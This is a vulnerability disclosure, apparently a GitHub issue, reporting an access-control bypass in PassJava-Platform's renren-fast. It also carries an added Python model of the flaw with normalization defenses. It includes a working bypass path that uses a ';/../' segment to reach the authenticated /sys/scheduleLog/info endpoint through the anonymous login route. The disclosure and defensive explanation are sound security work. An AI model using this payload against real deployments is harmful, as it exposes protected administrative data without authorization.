
There is an Incorrect Access Control vulnerability in PassJava-Platform

Open RacerZ-fighting opened this issue 9 months ago • 0 comments

[Suggested description] PassJava-Platform renren-fast was found to have an Incorrect Access Control vulnerability up to 3.0.0, resulting in information leakage.

[Vulnerability Type] Incorrect access control

[Vendor of Product] https://github.com/Jackson0714/PassJava-Platform

[Affected Product Code Base] all versions (<= 3.0.0)

[Affected Component] renren-fast /sys/scheduleLog/info API that requires authentication

[Attack Type] Remote

[Vulnerability details] Directly sending the payload below to the API /renren-fast/sys/scheduleLog/info/1 will fail because of the authentication.

POST /renren-fast/sys/scheduleLog/info/1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Connection: keep-alive
Cookie: JSESSIONID=6A54110114F288E6F7FC6AC6C7D23772

However, sending the payload below to the API /renren-fast/sys/login;/../scheduleLog/info/1 will bypass the authentication.

(screenshot of the request)

RacerZ-fighting, Mar 17 '25 12:03
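The bypass reported above works because the component that decides whether a request needs authentication does not see the same path the servlet container routes to: a `;` starts a path parameter, and `;/../` lets the attacker hide a `..` segment from a matcher that truncates at the semicolon while the router still resolves it. The following is an added example written for this page, not code from PassJava-Platform, renren-fast or Apache Shiro; it models the mismatch with a toy filter chain and shows the fix of normalizing the path exactly as the router will before matching it. The context path `/renren-fast` and the chain `/sys/login -> anon`, `/sys/** -> authc` are assumptions for illustration, not taken from the project's configuration.

```python
# Added example (not code from PassJava-Platform, renren-fast or Shiro): a toy model
# of an authorization layer whose view of the request path differs from the router's,
# and how a ';/../' segment exploits that gap.
#
# Assumptions (illustrative only): the servlet context path is /renren-fast, and the
# filter chain maps /sys/login to "anon" and everything else under /sys/** to "authc".

CONTEXT_PATH = "/renren-fast"

# Ordered filter chain, first match wins (assumed for the example).
FILTER_CHAIN = [
    ("/sys/login", "anon"),
    ("/sys/**", "authc"),
]


def ant_match(pattern: str, path: str) -> bool:
    """Minimal Ant-style matcher: exact match, or a trailing '/**' matching any suffix."""
    if pattern.endswith("/**"):
        base = pattern[:-3]
        return path == base or path.startswith(base + "/")
    return path == pattern


def filter_for(path: str) -> str:
    """Return the filter name for a context-relative path; unmatched paths are denied."""
    for pattern, name in FILTER_CHAIN:
        if ant_match(pattern, path):
            return name
    return "deny"


def strip_context(path: str) -> str:
    """Remove the context path prefix so chain patterns are context-relative."""
    if path == CONTEXT_PATH or path.startswith(CONTEXT_PATH + "/"):
        return path[len(CONTEXT_PATH):] or "/"
    return path


def naive_path(uri: str) -> str:
    """Flawed extractor: chops the URI at the first ';' and never resolves '..'.
    Everything after the ';' is invisible to the authorization decision."""
    return strip_context(uri.split(";", 1)[0])


def hardened_path(uri: str) -> str:
    """Resolve the path the way the router will route it, *before* authorizing:
    drop ';param' from every segment, collapse '.' and '..', refuse root escapes."""
    segments = []
    for raw in uri.split("/"):
        seg = raw.split(";", 1)[0]       # path parameters belong to one segment only
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                raise ValueError("path escapes the root")
            segments.pop()
        else:
            segments.append(seg)
    return strip_context("/" + "/".join(segments))


def is_irregular(uri: str) -> bool:
    """Strict alternative: reject request targets a legitimate client never sends."""
    return ";" in uri or "/../" in uri or uri.endswith("/..") or "//" in uri


def decide(uri: str, extractor) -> str:
    """Run the chain on the path produced by the given extractor; errors mean deny."""
    try:
        return filter_for(extractor(uri))
    except ValueError:
        return "deny"


if __name__ == "__main__":
    legit = "/renren-fast/sys/scheduleLog/info/1"
    evil = "/renren-fast/sys/login;/../scheduleLog/info/1"
    print("legit, naive   :", decide(legit, naive_path))      # authc
    print("evil, naive    :", decide(evil, naive_path))       # anon  (bypass)
    print("evil, hardened :", decide(evil, hardened_path))    # authc
    print("evil, strict   :", is_irregular(evil))             # True
```

The two defenses are complementary: `hardened_path` makes the authorization decision on the same canonical path the router uses, so no parameter or dot-segment trick can make the two disagree, while `is_irregular` simply refuses semicolons, traversal and empty segments up front, which is what a strict request firewall in front of the application does. Either one stops the `;/../` request; relying on the `anon` entry alone does not.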